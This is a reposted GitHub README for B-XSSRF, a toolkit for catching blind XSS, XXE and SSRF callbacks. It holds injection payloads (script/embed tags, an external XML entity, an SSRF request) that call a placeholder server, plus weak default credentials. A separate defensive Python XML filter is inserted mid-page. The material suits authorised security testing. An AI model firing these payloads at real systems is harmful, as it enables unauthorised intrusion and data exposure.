SpiderMate/B-XSSRF: Toolkit to detect and keep track of Blind XSS, XXE & SSRF
2019-09-02 00:59:54 Author: github.com (view original) Views: 302

B-XSSRF

SETUP

  • Upload the files to your server.
  • Create a database and import the database.sql file into it.
  • Set your DB credentials in the db.php file.
  • Ready.

USAGE

BLIND XSS

<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">

BLIND XXE

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
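
The defensive counterpart to the document above, as an added example that is not part of the B-XSSRF project: an XML intake routine that rejects any DOCTYPE before an entity can be declared or fetched, so the parser never contacts request.php. The names parse_untrusted, verdict, ForbiddenXML and PLAIN_DOC are hypothetical, and it uses Python's standard-library expat bindings.

```python
from xml.parsers import expat

# The document from the BLIND XXE section above, embedded as sample input.
PAGE_XXE_DOC = b"""<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
"""
# Constructed benign input with no DTD.
PLAIN_DOC = b"<order><item>1</item></order>"


class ForbiddenXML(ValueError):
    """Untrusted XML carried a DTD, entity declaration or external reference."""


def parse_untrusted(data):
    """Parse XML, refusing any DTD; return element names in document order."""
    names = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML("DOCTYPE %r not allowed in untrusted input" % name)

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML("entity %r (SYSTEM %r) not allowed" % (name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        raise ForbiddenXML("external fetch of %r refused" % sysid)

    # Reject at the first sign of a DTD; the other two handlers are a backstop.
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


def verdict(data):
    """Return (accepted, detail) instead of raising, for use in a request filter."""
    try:
        return True, ",".join(parse_untrusted(data))
    except ForbiddenXML as exc:
        return False, str(exc)
    except expat.ExpatError as exc:  # malformed XML is rejected as well
        return False, "malformed: %s" % exc
```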

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS

USER : [email protected]
PASS : 123456

Source: https://github.com/SpiderMate/B-XSSRF